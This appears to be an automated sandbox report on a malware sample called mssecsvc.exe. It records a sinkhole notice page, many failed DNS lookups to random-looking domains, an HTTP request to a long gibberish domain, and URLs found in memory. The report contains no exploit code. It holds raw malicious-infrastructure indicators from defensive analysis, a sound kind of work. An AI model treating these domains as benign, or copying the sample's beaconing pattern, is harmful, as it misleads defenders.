<!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: unknown | DNS traffic detected: query: lanclm.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: atvhio.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: toxthr.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: qmehuz.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: uplveo.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: fosajt.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: tpmtiw.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: tvmwem.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: kuwazq.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: lcogil.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: otidym.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: qmimjr.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: xeefyh.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: chlntf.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: fudevu.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: aaeyfv.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: egrbjv.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: wcxezu.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: mvnywi.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: qtnarp.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: jwbsjo.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: liamse.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: boqbzc.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: paelui.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: rjirxk.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: akeofy.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: pangeq.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: abeaay.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: qoumtu.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: jiarfr.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: dnirke.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: wlnmvm.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: xyzrpb.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: seyuei.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: uagfvy.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: vwfgtb.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: cixudc.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: rchrgb.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: tgvyjo.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: oezaau.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: phirwq.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: wufhfo.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: rffriz.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: dzbyvr.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: iremdw.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: clpivo.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: djtidt.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: trptke.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: dvnexx.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: hmpjac.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: ysvfez.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: youdqa.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: uxcrve.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: qgbuwt.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: enqgsr.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: bnwzie.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: mbxpjh.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: otoagh.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: kfgoeu.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: ureefd.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: zyjedf.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: glutbe.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: xgxizm.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: exevye.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: uyjpue.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: wnzgoe.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: ihepfj.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: iireby.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: eymtmi.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: smezbn.com, reply code: 3 (Name Error, NXDOMAIN)
Source: unknown | DNS traffic detected: query: btkcso.com, reply code: 3 (Name Error, NXDOMAIN)
              Source: unknownDNS traffic detected: query: poydst.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: eeauou.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: veqbbn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: olieyo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ktceha.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pxunuy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ahanjw.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qavmrl.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: vgemhe.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uaqjzn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cerbyj.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wfuinm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pnuoyg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fuejrn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bauied.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dpoead.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: exiuuy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: niongj.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: joddge.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cudiqm.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iooaeg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uatacq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: aoulrr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: quydys.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 104.16.173.80 104.16.173.80
              Source: svchost.exe, 00000021.00000000.356224558.00000219BE6C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788969957.00000219BE6C7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.facebook.com equals www.facebook.com (Facebook)
              Source: svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: svchost.exe, 0000000F.00000000.294511451.000001BC27D13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.796337962.000001BC27D13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282592665.000001BC27D13000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cdn.content.prod.cms.msn.com/singletile/summary/alias/experiencebyname/today?market=en-US&sou
              Source: lsass.exe, 0000000B.00000000.281178708.0000025D33A00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.789755252.0000025D33A00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272446566.0000025D33A00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.790193302.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281207847.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272509721.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: lsass.exe, 0000000B.00000002.790425862.0000025D33A2B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272531503.0000025D33A2B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281220784.0000025D33A2B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: lsass.exe, 0000000B.00000000.272068694.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.786738736.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: svchost.exe, 00000027.00000000.398010629.000002631E56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.790193302.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281207847.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272509721.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272068694.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272020741.0000025D33267000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.790193302.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281207847.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.272509721.0000025D33A20000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280961439.0000025D33267000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
              Source: svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.comsv
              Source: lsass.exe, 0000000B.00000000.272958892.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.792359229.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281475568.0000025D33AF4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.281628009.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.273339929.0000025D33B62000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0~
              Source: svchost.exe, 00000021.00000000.356224558.00000219BE6C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788969957.00000219BE6C7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
              Source: mssecsvc.exe.2.dr | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Source: mssecsvc.exe, 00000008.00000002.351098719.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000008.00000002.351240115.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
              Source: mssecsvc.exe, 00000004.00000002.498964463.000000000019C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 0000000F.00000000.293803098.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.794537669.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282252800.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://candycrush.king.com/mobile/windows/TileTemplate.xml
              Source: svchost.exe, 0000000F.00000000.282350573.000001BC27CB1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.793472682.000001BC27C0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.795300147.000001BC27CB1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282060280.000001BC27C0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.293382810.000001BC27C0F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-US
              Source: svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
              Source: svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000015.00000003.321758168.0000018D75241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322285690.0000018D75242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000027.00000002.805268314.000002631E79E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.400313663.000002631E79E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://site-cdn.onenote.net/161182431559_Images/LiveTileImages/MediumAndLarge/Image1.png
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
